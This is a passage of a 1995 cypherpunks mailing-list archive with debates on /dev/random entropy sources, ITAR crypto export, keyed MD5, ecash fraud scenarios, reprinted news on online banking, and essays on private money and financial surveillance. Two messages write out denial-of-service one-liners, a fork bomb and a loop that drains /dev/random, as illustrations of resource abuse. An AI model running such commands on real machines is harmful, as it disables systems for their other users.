> has an expensive and uncertain legal experience ahead of him.

Jumping in hastily:

It seems to me that Ed faces a larger problem if the above scenario turns
out to be a viable attack. Consider the following sequence: Alice and
Charlie decide to get some (payee-anonymous) currency laundromat in hot 
water. Alice (payer-anonymously) washes some coins at the laundromat.
Con-man Charlie claims he didn't get paid for some fictional transaction with
Alice. Alice complains to the bank, and the rest proceeds as before. The
Alice-frames-Ed situation is functionally equivalent to the Bob-robs-Charlie
situation from the bank's perspective.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Oct 1995 22:15:13 +0800
To: cypherpunks@toad.com
Subject: Smart Snoops
Message-ID: <199510311348.OAA13053@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Wall Street Journal, October 30, 1995, p. B3.


Netcom to Use Smart Switches For the Internet

By Audrey Choi


Internet provider Netcom On-Line Communication Services Inc.
said it will use high-speed network switches from Cascade
Communicaffons Corp. in a move to upgrade the speed and
flexibility of its Internet services.

Netcom's decision represents a significant endorsement for
Cascade, a small Westford, Mass.-based company whose revenues
have soared along the rapid growth of the Internet. In
addition to Netcom, Cascade also is supplying switching
devices, which control the flow of information across a
far-flung computer network, to UUNet Technologies Inc. and
Performance Systems International Inc.

To prepare for an expected rise in the number of users,
networking analysts say the Internet needs to move toward a
more efficient architecture based on high-speed intelligent
switches, like Cascade's, which not only allow large volumes
of data to be transmitted quickly, but also offer Internet
service providers the ability to track and manage the data
being transported.

Brad Meinert, senior analyst at research firm Input, says the
tremendous growth of the World Wide Web, a graphics Internet
interface, "is putting increased capacity demands for greater
bandwidth on the Internet infrastructure."

In the past, the Internet depended primarily on simpler
router-based wide-area networks that provided access to users
with dial-up modems and leased lines. Bundles of data moving
over this kind of network is evaluated and processed at each
router until it arrives at its destination -- a tedious
process that can adversely affect time-sensitive applications,
such as video conferencing.

"We've been talking about an information super highway, but
our infrastructure is really just dirt roads," said Daniel E.
Smith, Cascade's president and chief executive. Mr. Meinert
noted that "switching is clearly the next generation, which
allows you to create the virtual network."

Financial details of the Netcom deal weren't disclosed, but
Cascade's Mr. Smith said the deals with the three major
Internet providers initially represents "tens of millions of
dollars" of business. UUNet said it has purchased $6.5 million
worth of Cascade products.

Cascade's switches provide the highest port density and
highest network capacity, analysts say. Its switches range in
cost from $25,000 to $250,000 and enable a far greater number
of users to access the Internet through any one point. While
a typical router may be able to handle 20 to 50 users, a
single Cascade switch can accommodate 1,000 users, says Desh
Deshpande, Cascade's founder and marketing vice president.
Additionally, the management capabilities of the smart
switches enable Internet providers to track how many data
bundles a customer sends, where each bundle is at any point in
time, and what priority on the network they should be given.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 31 Oct 1995 22:22:07 +0800
To: cypherpunks@toad.com
Subject: Virtual Security Jitters
Message-ID: <199510311351.OAA13151@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, October 30, 1995, p. 13.


Online bank era dawns

By Louise Kehoe

The Security First Network Bank established by Cardinal
Bancshares -- a small Kentucky savings and loan institution is
the first financial institution to conduct true online banking
over the Internet.

SFNB's pioneering effort may influence the growth of Internet
banking. Larger financial institutions are watching for clues
as to how consumers respond and to see whether the cyberbank
can live up to its "Security First" name.

Concerns about Internet security exacerbated by incidents in
which supposedly secure software has proven vulnerable -- have
made banks cautious. SFNB claims to have created a "virtual
vault" for each customer account, using a "trusted" computer
operating system from Hewlett-Packard the second largest US
computer company, as well as encryption and user
authentification software, and firewalls.

"We have overcome the problem that has prevented banks from
transacting over the Internet," said James Mahan, SFNB's
chairman.

Perhaps cyberbanking's biggest draw is that the SFNB is open
24 hours a day, seven days a week. Customers will be able to
conduct standard personal banking tasks such as paying bills,
transferring funds from one account to another and checking
the balance of an account.

Nor are there queues at the counters in the "virtual lobby" of
the SFNB which are staffed by computer renditions of
R2D2-style robots (http://www.sfnb.com).

But waiting for images to download from the Internet over a
modem may persuade users that a bus trip to their local bank
is not such a bad idea.

SFNB also faces competition from more than 20 US banks
including Chemical Bank, Wells Fargo and First Interstate that
have formed partnerships with Intuit, the leading personal
finance software company, to enable users of the popular
Quicken program to access information from their accounts and
pay bills electronically.

Services offering stock prices, information about mortgages,
loans and retirement funds as well as insurance are
flourishing.

Some of the most innovative include BankAmerica's new Web site
which opened a week ago with an invitation to users to "build
your own bank". By filling in a form, users can tailor the
information presented to fit their interests.

A student, for example, might be presented with information
about obtaining loans for college fees. Someone close to
retirement age would automatically be routed to information
more relevant to his interests.

One of the largest mortgage lenders in the US, Bank of
America, has also chosen to put an emphasis on property
purchases at its Web site.

Hyperlinks to real estate firms throughout the US enable users
to search through lists of homes for sale and then to link
back to the bank in order to apply for financing
(http://www.bankamerica.com).

Among the biggest attractions of the Internet for consumers,
including consumers of financial services, is the ability to
"shop around" so as to compare costs and advantages.

The insurance industry is taking this to heart in a new
service that goes live today. Insweb will enable consumers to
seek quotes from a range of companies and brokers on life,
home, car and medical insuranee.

The service, established by a group of 25 insuranee companies
and related organisations is the first "marketplace" on the
Internet for insurance information and commerce.

Insweb plans to enable users to purchase insurance online. In
a pilot program next month, residents of the state of Utah
will be able to buy car insurance via the Internet
(http://www.insweb.com).

-----

Internet Law Review is a monthy paid-for publication available
electronically or on hard copy from December. Among other
issues, it will cover IT-law and the Internet; commercial
security and encryption, using contributors from North America
and Europe. Subscription is $220 a year and details are
available from <www.thinck.com/publications.html>. Meanwhile,
details of this week's Internet Law Symposium in Seattle are
available at <www.discovery.org/ils95>.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Wed, 1 Nov 1995 05:48:18 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <9510312008.AA27100@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Tue, 31 Oct 1995 19:15:35 +0200
   From: Mark Murray <mark@grondar.za>

   >    Is this millisecond accuracy quantifiable in terms of bits of entropy?
   >    if so, the ethernet is surely safe?
   > 
   > Well, no.  If you're only using as your timing the 100Hz clock, the
   > adversary will have a better timebase than you do.  So you may be adding
   > zero or even no bits of entropy which can't be deduced by the adversary.

   In a 386 or a 486 (under FreeBSD at least) there is a 1Mhz clock available.
   How would _this_ be? On the Pentium there is the <whatsit?> register
   which will give the board's oscillator (or 90 MHz) I believe.

What's HZ set at for FreeBSD?  Most of the x86 Unixes have generally
used HZ set at 100, because the interrupt overhead on a x86 isn't cheap,
and so you want to limit the number of clock interrupts.

You can sample the timing clock, but it turns out to be rather expensive
to do so; several I/O instructions, which will require several delays if
they have to go through your 8 MHz ISA bus.  We've moved away from using
the hardware clock on the 386 because of the overhead concerns.  On the
Penitum, we use the clock cycle counter.

   What then is a body to do? Preserve all _verifiable_ randomness like gold?
   Dish it out under some quota? A denial of service attack would be

Well, verifiable randomness really is like gold.  It's a valuable
resource.  On a time-sharing system, where you really want to equitably
share *all* system resources perhaps there should be a quota system
limiting the rate from which a user is allowed to "consume" randomness.

On the other hand, most Unix systems *aren't* great at doing this sort
of resource allocation, and there are enough other ways of launching
denial of service attacks.  "while (1) fork();" will generally bring
most systems to their knees, even in spite of limitations of the number
of processes per user.  Most Unix systems don't protect against one user
grabbing all available virtual memory.  And so on....

   forever {
	   cat /dev/random > /dev/null
   }

   Severely limiting most decent folk's chance at getting PGP to work.

If you have such a "bad user" on your system, and the PGP /dev/random
code is written correctly, it will only be a denial of service attack.
But it'll be possible to identify who the bad user is on your system,
and that person can then be dealt with, just as you would deal with some
user that used up all of the virtual memory on the system trying to
invert a 24x24 matrix, or some such ---- in both scenarios, the ability
for another user to run PGP is severely limited.  

There's nothing special about /dev/random in this sense; it's just
another system resource which can be abused by a malicious user, just
like virtual memory or process table slots.

   > So I like to be conservative and use limits which are imposed by the
   > laws of physics, as opposed to the current level of technology.  Hence,
   > if the packet arrival time can be observed by an outsider, you are at
   > real risk in using the network interrupts as a source of entropy.
   > Perhaps it requires buidling a very complicated model of how your Unix
   > scheduler works, and how much time it takes to process network packets,
   > etc.  ---- but I have to assume that an adversary can very precisely
   > model that, if they were to work hard enough at it.

   This is a strong argument for some form of specialised noise source.
   I have read of methods of getting this from turbulent air flow in a hard
   drive (an RFC, I believe).

Yes, ultimately what you need is a good hardware number generator.
There are many good choices; from radioactive decay, noise diodes, etc.

I'm not entirely comfortable with the proposal of using air flow
turbulance from a hard drive, myself, because the person who suggested
this still hasn't come up with a decent physical model which tells us
how many bits of true entropy this system really provides.  What Don
Davis did was to develop more and more sophisticated models, and
demonstrated that his more sophistcated models weren't able to explain
the "randomness" that he observed in the time that it took to complete
certain disk requests.  However, that doesn't prove that the
"randomness" is really there; it's just that he couldn't explain it
away.  It might be that the NSA has a much better model than Don Davis
was able to come up with, for example, and the amount of randomness from
air turbulance really is a lot less than one might expect at first
glance.

Short of good hardware sources, the other really good choice is
unobservable inputs.  Hence, the Linux driver is hooked into the
keyboard driver, and the various busmice drivers.  Those are really
wonderful sources of randomness, since they're generally not observable
by an adversary, and humans tend to be inherently random.  :-)

						- Ted





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 08:02:46 +0800
To: djw@pdcorp.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510280045.RAA10830@email.pdcorp.com>
Message-ID: <199510312113.QAA16575@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Dan Weinstein writes:
>>If anyone from MIT is reading this, it would be a real public service to 
>>put on a web site (a) what the system used for the release of PGP is 
>>exactly and (b) what assurances (oral, written, names & dates) was 
>>received from State/Commerce that this was legal.
>
>You are assuming that because the government has chosen not to
>prosecute MIT that they will not prosecute anyone else.  This is a
>faulty assumption, laws are not invalidated if they are not enforced,
>only if they are repealed or overturned.

IANAL, but this seems implausible.  If MIT has received assurances
(written or oral) from the DoJ that indicate that their scheme is
adequate, then another organization prosecuted while following an
identical scheme can admit this as evidence.

There isn't, to my knowledge, a specific law which defines the act of
export over the 'net.  The DoJ, in effect, determines the definition by
their actions.  Failure to prosecute MIT should lead a responsible
judge to dismiss actions against a subsequent defendant that follows
the same practice.

I agree that things would be different in cases like traffic laws:  the
fact that millions of people exceed legal speed limits every day
doesn't make speeding laws invalid, but this is a matter where there is
no question whether the act broke the law.  Where the line is drawn by
the legislature, failure of the executive does not invalidate the law
--- it merely tarnishes the reputation of the executive.  Where the
line is drawn by the executive, failure to prosecute moves the line,
IMHO.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 1 Nov 1995 05:22:00 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
Message-ID: <9510312013.AA12543@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
> "tokens", and do something about getting both sides to agree on which GSS
> "mechanism" is to be used, and on what Principals are involved?

Yes, exactly.  Of course negotiation and naming are often the harder
issues.  It is a pity that HTTP-NG seems to be inventing protocol-specific
crypto-systems, rather then designing a general one and then being its
first customer.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 1 Nov 1995 05:45:06 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <199510312331.SAA03949@jekyll.piermont.com>
Message-ID: <9510312015.AA00768@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>A keyed version of MD5 is the base authentication mechanism in IPSP
>and it has been heavily examined by a number of very good
>cryptographers.

Yes we reviewed it and said that it sucked.

Phil wrote a note to Ron and Ron sent in a series of comments. I suggested that
the idea of a keyed digest be stated as a separate concept from a hash function.
Functions of one variable are intrinsically different from functions of two 
variables.

The sequence of events I heard was that they asked Burt Kaliski for a suggestion,
he gave them one and they chose something different.

	
>Isn't this what the GSS-API is about?  Couldn't HTTP-NG just convey GSS
>"tokens", and do something about getting both sides to agree on which GSS
>"mechanism" is to be used, and on what Principals are involved?

GSS is often brought up on occasions like this. I have never seen an architectural
overview of what it is trying to achieve for me or how. When I am provided 
with a clear definition of what it is I hope to arrive at a clear explanation 
of why I'm not using it. Unfortunately the RFC process strips the rationale
part out of the specs. 


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 1 Nov 1995 07:47:59 +0800
To: Jim Castleberry <jcastle@in-system.com>
Subject: Re: PGP 2.6.2 signator replacement bug fix
In-Reply-To: <9510311803.AA11158@toad.com>
Message-ID: <199510312113.QAA01220@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


PGP 2.6.2 is not going to be re-released.  I have been working on a
PGP 2.6.3 release, but I must admit that I haven't had as much time as
I would like to work on it.

Before 2.6.3 is released, all of the reported bugs (which are
currently archived and marked as fixed when the bug is fixed) will be
hand-checked.  Unfortunately I just have not had the time to work on
this, due to other obligations.  Hopefully I will have more time this
winter.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Wed, 1 Nov 1995 07:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
In-Reply-To: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
Message-ID: <Pine.LNX.3.91.951031155712.7755A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Alan Patterson wrote:

> > Could someone PLEASE netmail me some _known reliable_ gates that use the
> > straight netmail address format (alt.whatnot@bosco.kollege.edu)?
> 
> If someone will direct me to sources, I'll try and setup a gate. (We use 
> INN).

I've gotten the gate up, but still working a few bugs out. Cypherpunks 
are welcome to use it but if it is abused, I will have to remove general 
access.

Until I can write a script to pull all the newsgroups from the active 
file and place aliases for them in sendmail, the only way to use it is 
via a Newsgroups: header. The address is mail2news@news.wsnet.com.

Let me know any bugs you may find.

Alan Patterson (lep@wsnet.com)        Fngpt: 41D0F61B496FECC09FABECF686AB2A1C
WSNetwork Communications Services, Inc.         PGP Encrypted Email Preferred
Montgomery, Alabama (334) 263-5505 (800) INET-750  Public Key @ MIT keyserver






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 1 Nov 1995 09:13:58 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <199510312113.QAA16575@universe.digex.net>
Message-ID: <199511010030.QAA09462@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:
>Dan Weinstein writes:
[unknown writes:]
>>>If anyone from MIT is reading this, it would be a real public service to 
>>>put on a web site (a) what the system used for the release of PGP is 
>>>exactly and (b) what assurances (oral, written, names & dates) was 
>>>received from State/Commerce that this was legal.
>>
>>You are assuming that because the government has chosen not to
>>prosecute MIT that they will not prosecute anyone else.  This is a
>>faulty assumption, laws are not invalidated if they are not enforced,
>>only if they are repealed or overturned.

>IANAL, but this seems implausible.  If MIT has received assurances
>(written or oral) from the DoJ that indicate that their scheme is
>adequate, then another organization prosecuted while following an
>identical scheme can admit this as evidence.

>There isn't, to my knowledge, a specific law which defines the act of
>export over the 'net.  The DoJ, in effect, determines the definition by
>their actions.  Failure to prosecute MIT should lead a responsible
>judge to dismiss actions against a subsequent defendant that follows
>the same practice.

It is also worth noting that the ITAR violation is worded somewhat
differently from some laws, requiring "willful" violation, a "specific
intent" to break the law.  In this situation, good faith efforts to apply
with what the law appears to be would seem to me to be a strong defense.
See <URL:http://www.portal.com/~hfinney/cryp_export1.html> for a writeup
I did on this a couple of years ago.  An excerpt, from U.S. v
Lizarraga-Lizarraga (541 F2d 826):

"Accordingly, we hold that in order for a defendant to be found guilty of
exporting under 22 U.S.C. 1934, the government must prove that the
defendant voluntarily and intentionally violated a known legal duty not
to export the proscribed articles, and the jury should be so instructed."

I am not a lawyer, however.  It would be interesting to hear what our
legal exports think of this argument.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 1 Nov 1995 07:23:41 +0800
To: cypherpunks@toad.com
Subject: A final Huber-Spam: ON MONEY
Message-ID: <v02120d00acbc472b58a4@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Note the URL.

There's more there for them as wants 'em.

Cheers,
Bob Hettinga


--- begin forwarded text

Date: Tue, 31 Oct 95 21:32:44 0500
From: Robert Hettinga <rah@shipwright.com>
Organization: Shipwright
MIME-Version: 1.0
To: rah@shipwright.com
Subject: 031692.html
X-URL: http://khht.com/huber/forbes/031692.html

http://khht.com/huber/forbes/031692.html>
 ON MONEY
>
> by Peter Huber
>
> Forbes, March 16, 1992 at Pg. 144
>
> Copyright 1992 by Peter Huber. Electronic copies of this document
> may be distributed freely, provided that this notice accompanies all
> copies.
>
> -------
>
> While Europe strains to give birth to a new currency, Boris Yeltsin
> toils to resurrect a dead one. With private markets triumphant
> everywhere else, however, the mystery is why governments still have
> to manufacture money at all.
>
> It is still often taken for granted that the one thing private
> markets cannot make is money itself: Only government can do that.
> But new governments of young nations, especially nations with
> turbulent histories, can't make money, either. Nobody quite trusts
> them, and without trust the paper lovingly engraved at the
> government mint is valueless.
>
> Until recently, people put up with a lot of government paper because
> even bad paper was more convenient than the alternative, which was
> barter. Every self-respecting capitalist knew that government paper
> was a perishable good, that it always decayed, slowly in
> Switzerland, fast in Brazil, and most just put up with it. But if
> capitalists can produce candies that melt in your mouth, not in your
> hand, why not currencies, too?
>
> Money, as I wrote here two years ago (FORBES, May 14, 1990), is just
> another network, our oldest medium of systematic communication. And
> new communications technologies are fast surpassing the old. The
> paperless bank, unlike the paperless office, is at hand.
>
> When it works, the old-fashioned paper we call money reliably
> records past effort and promises future return. It's all a matter of
> communication among stable communities of productive people. This is
> why individuals can issue currencies, too -- personal checks, IOUs,
> that sort of thing. Once it's established of an individual that her
> word is her bond, she can in fact issue private currency at will, at
> least among people who know her.
>
> But the trouble with private currencies has always been their
> informational overhead. Personal checks bounce, the "I" behind the
> IOU absconds to Monaco, Macy's defaults on its bonds. Private paper
> is also volatile; pegging current value requires specialized
> information from Wall Street, or a bank in Oshkosh, or a trading pit
> in Chicago. In the past, it's often been cheaper to put up with the
> steady but modest thievery of a central bank, which peels off 3%
> (will it soon be 6%?) of your dollar every year through inflation,
> than to sort out whose private paper is worth what at any given
> moment.
>
> Computers and fiber-optic communications are changing all that. Our
> new central bankers can be concerns like TRW and Dun & Bradstreet,
> which track who's solvent and who's a deadbeat and convey the
> information instantly, at the touch of a button, wherever it's
> needed. Our new mints and engravers can be companies like Visa and
> AT&T, which clear millions of transactions daily, both here and
> abroad.
>
> What enterprises like these supply are the informational ingredients
> of money. They already are far better than Alan Greenspan at
> stabilizing value by assembling baskets of private paper as varied
> and diversified as the global economy. Information about who earned
> a credit yesterday or who can be trusted to pay back a debt tomorrow
> can be passed around as easily as a dollar bill. More easily, in
> fact.
>
> Like religious liturgies conducted in some otherwise dead language,
> transactions may still be denoted in dollars or yen, but these
> vestiges of an earlier age will ultimately give way to a new
> financial vernacular. If everybody paid for everything (wages
> included) by credit card, for example, the accounts could just as
> well be denoted in pork bellies, IBM stock, quarterpounders with
> cheese, or (more likely) some very large basket of hundreds of
> different private goods and services, tangible and intangible.
>
> The Lynch, for example, might be a share in a standard pool of
> commodity receipts maintained by Merril Lynch. Nobody would fully
> trust the Lynch, of course, even if backed by 100% reserves, but
> nobody would have to. Nobody trusts his food supply to any one
> farmer, either. You diversify, you assemble baskets of baskets, and
> you constantly search for quality goods and reliable supply. Same
> with money. When the network and the computers behind it are
> powerful enough, no central authority can or should supply the
> currency, and no one will pay annual tribute by way of inflation to
> the government mint. And with private money, private fortunes will
> no longer be held hostage to public ineptitude in the Kremlin or on
> Capitol Hill.
>
> So back to Yeltsin and how we can help him. Despite the corrupting
> influences of the regulatory collectivist on our own shore,
> America's phone companies and banks are still the best in the world.
> Yeltsin needs them, far more than he needs the International
> Monetary Fund, Pizza Hut or Western investment in Russia's oil
> industry. Modern telefinancial enterprises can deliver the real oil
> of the economy: truly stable media of exchange.
>
> The biggest contribution Yeltsin can make to Russia's fiscal policy
> is to make way for currency capitalists. No exchange controls, no
> bank insurance, no loan guarantees, no criminal prosecution for
> ordinary bankruptcy, nothing but basic, narrowly interpreted laws
> against outright fraud.
>
> Will the new private banks sometimes fail? Of course they will. Will
> widows then be ruined? Certainly. So what else is new? In Russia
> today the only bank in town has failed miserably, and the one cold
> comfort for widows is that the ruin is universal. Give it a try,
> Boris. You have nothing to lose but your rubles.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 07:25:54 +0800
To: koontz@maspar.com (David G. Koontz)
Subject: Re: InfoWar
In-Reply-To: <9510311924.AA09550@argosy.MasPar.COM>
Message-ID: <199510312244.RAA19266@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


David G. Koontz writes:
> 
>>Industry representatives played down the privacy loopholes.
>>Ronald Plesser, a Washington attorney who represents online
>>services and direct marketing firms, said, "I know of no
>>example of anybody trafficking in e-mail descriptions." A
>>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
>>do not release names of customers that ordered movies.
> 
>The name of the customer of a video tape rental may be disclosed
>only under narrow constraints (USC 18 Chap 121 2710):

Didn't you read the post?  The whole point was that the constraints
*don't* cover many *new* technology.  Sure, your local video store
can't release the data, but your *cable* company is under no such
constraint with regard to pay-per-view.  Ditto with Hughes DirecTV.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 Nov 1995 07:37:18 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
In-Reply-To: <199510311715.TAA05821@grumble.grondar.za>
Message-ID: <199510312247.RAA19315@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Murray writes:
>Can they predict thermal noise in a cheap transistor? ]:->

As Perry pointed out in the last round on hardware noise generators, they
may not be able to predict it, but they *may* be able to generate a field
which will *influence* it.

It's difficult to know for sure if your noise source is really random,
and to what degree.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 1 Nov 1995 02:22:27 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510310427.AA28252@zorch.w3.org>
Message-ID: <199510311650.IAA09144@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995 23:27:36 -0500, you wrote:

> Hash functions		MD5, SHA

I presume you mean SHA-1.

I would prefer to see MD5 deleted.  A 128 bit hash simply seems too
marginal in length for long term use in most hash applications.  I
would much rather see something like Haval as a second hash algorithm.
It can be faster than MD5, and can easily be tailored to the hash
width you want.  If 128 bit hashes are really needed, use Haval's
128-bit option.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 1 Nov 1995 07:37:22 +0800
To: cypherpunks@toad.com
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <9509318151.AA815185987@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     Theodore Ts'o writes...
     >Yes, ultimately what you need is a good hardware number generator.
     ...
     >I'm not entirely comfortable with the proposal of using air flow 
     >turbulance [sic] from a hard drive
     ...
     
     Two important observations about the use of a disk drive to get 
     randomness:
     
     1. In the case of some workstations, the local network provides the 
     disk drive and there isn't a local hard drive at all.  Hence, any 
     timing of disk accesses will give you data that is influenced by the 
     file server more than the disk drive.
     
     2. When doing time domain measurements (Hewlett Packard had some good 
     application notes on this subject), you must consider base clock 
     jitter.  Ill try to illustrate with a diagram:
     
     actual event:            V                    V
     clock granularity:  /...../...../...../...../...../...../
     
     the problem is that no matter how small the basic clock unit is 
     (symbolized by "/", above), you can't be sure how much of that unit 
     has passed when the event (symbolized by "V", above) occurs.  For 
     example, on the original IBM PC, clock interrupts occurred about 18.2 
     times per second (55ms interval).  In that architecture, you can't 
     time an event and have an uncertainty of less than 2 times 55ms
     
     If you propose using a special hardware random generator, you have a 
     different set of problems:
     
     1. You need to buy and install hardware on many different platforms -- 
     you don't always have access to do that.
     
     2. Many earlier posts on this subject pointed out that removing bias 
     was important.  In that case, you need to continuously test and 
     recertify the hardware random generator for randomness.  In order to 
     do that, you need to have so much knowledge about generating and 
     testing random numbers in software that you might as well use a 
     software solution in the first place.
     
     Good luck





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Wed, 1 Nov 1995 02:38:17 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
Message-ID: <Pine.3.89.9510311704.A11286-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Hal wrote:

> Also, I believe in normal use Digicash coins are marked as being for a
> specific recipient.  This is not certain since no details have been
> released.  And apparently it can be worked-around by the spender by
> marking the recipient as just "@" (or some such string).

Yep, it's optional. You can specify the account id of the recipient, in 
which case it's encrypted into the ecash message somehow, or you can 
leave it blank, in which case anyone can deposit it in their account. Or 
at least that's what the DigiCash people told me.

I think it only works that way if you select email payment, when it gives 
you a box for the account id to pay to.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frezza@interramp.com (Bill Frezza)
Date: Wed, 1 Nov 1995 07:49:56 +0800
To: cypherpunks@toad.com
Subject: Electronic Warfare
Message-ID: <v01530500acbc17d17da1@[38.12.14.130]>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,

With your indulgence I would like to post this short essay here, which was
stimulated by a recent report posted on this list that was passed on to me.
The essay just ran as an op-ed piece in this week's issue of Communications
Week. I would like to thank and acknowledge the author off the original
report as well as encourage the cypherpunk community to keep me posted on
related issues. (I cannot keep up with the volume on this list and, hence,
am not a subscriber.)

Thank you,

Bill Frezza
Columnist
Communications Week
Network Computing Magazine
frezza@interramp.com

---------------------------------------------------------------------------

ELECTRONIC WARFARE WAGES ON - AND YOU'RE THE TARGET

Although the flap over the Clinton administration's attempt to promote
escrowed-key encryption systems like Clipper has temporarily faded, the war
on electronic privacy continues.   As proceedings at the Fourth
International Conference on Money Laundering, Forfeiture, Asset Recovery,
Offshore Investments, the Pacific Rim, and International Financial Crimes
reveal, there has been no let up in our government's efforts to blockade
the cyber-frontier.

No, you won't learn much from the Wall Street Journal or the New York
Times, written by journalist-generalists who have no clue about where this
technology is heading.  The Feds have become so skilled at manipulating the
Old Media that stories about electronic privacy  invariably center on the
latest drug kingpin, pedophile, or domestic terrorist.  Attacking these
universally abhorred enemies of the people not only makes for good
headlines but keeps privacy advocates off balance as they are forced to
defend abstract rights using loathsome examples.  But if you tune in to the
Cypherpunks mailing list (majordomo@toad.com) you can get some excellent
first hand reports from the front.

In the relatively short period since the passage of the Bank Secrecy Act,
which, among other things, obliges banks to file Suspicious Activity
Reports on its customers, banks have become virtual deputies in the
treasury department's war on uncontrolled financial transactions.  And this
war is increasingly spilling into cyberspace.

The conference underscored the fact that, paradoxically, we are heading not
toward more specific and well defined transaction monitoring regulations,
but less.  How so?  The problem with making regulations precise is that
what software algorithms can define, other algorithms can evade.  Instead,
regulation by "raised eyebrow" is becoming the norm.  Federal bank
examiners have been given significant latitude to invoke draconian
penalties against uncooperative banks.  Because bank officers have few
due-process protections under this regime, it is no surprise that most of
them have become sniveling toadies.  The objective is to insure that banks
"voluntarily" introduce even more aggressive, unpredictable, and intrusive
monitoring than the government would ever dare mandate.  And to make sure
nothing slips through the cracks, human surveillance will be supplemented
with artificial-intelligence agents that can perform pattern analysis on
the aggregate flow of electronic transactions, flagging anything remotely
suspicious.  George Orwell would be impressed.

Lest you think that all of this is motivated solely by the drug war,  a
visit to the Treasury Department's Financial Crimes Enforcement Network
(FinCEN) homepage
(http://www.ustreas.gov/treasury/bureaus/fincen/facts.html) should open
your eyes.  This battle is not just about drug prohibition, a crime the
Treasury Department would have to invent if it didn't already exist.  The
real struggle is about the future of tax compliance, and it has you in its
sights.

A famous Revolutionary War era pamphleteer, writing under the pseudonym
"Brutus", perhaps said it best 200 years ago when he wrote - "The national
government through its taxing power will introduce itself into every corner
of the city and country.  It will take cognizance of the professional man
in his office or his study;  it will watch the merchant in his store;  it
will follow the mechanic to his shop and his work, and will haunt him in
his family and his bed;  it will be the constant companion to the
industrious farmer in his labour;  it will penetrate into the most obscure
cottage;  and finally it will light upon the head of every person in the
United States.  To all these different classes of people and in all these
circumstances on which it will attend them, the language in which it will
address them will be GIVE! GIVE!"

What Brutus didn't know and what the cypherpunks foresee is that one day
strong encryption will make it impossible to spy on our activities in
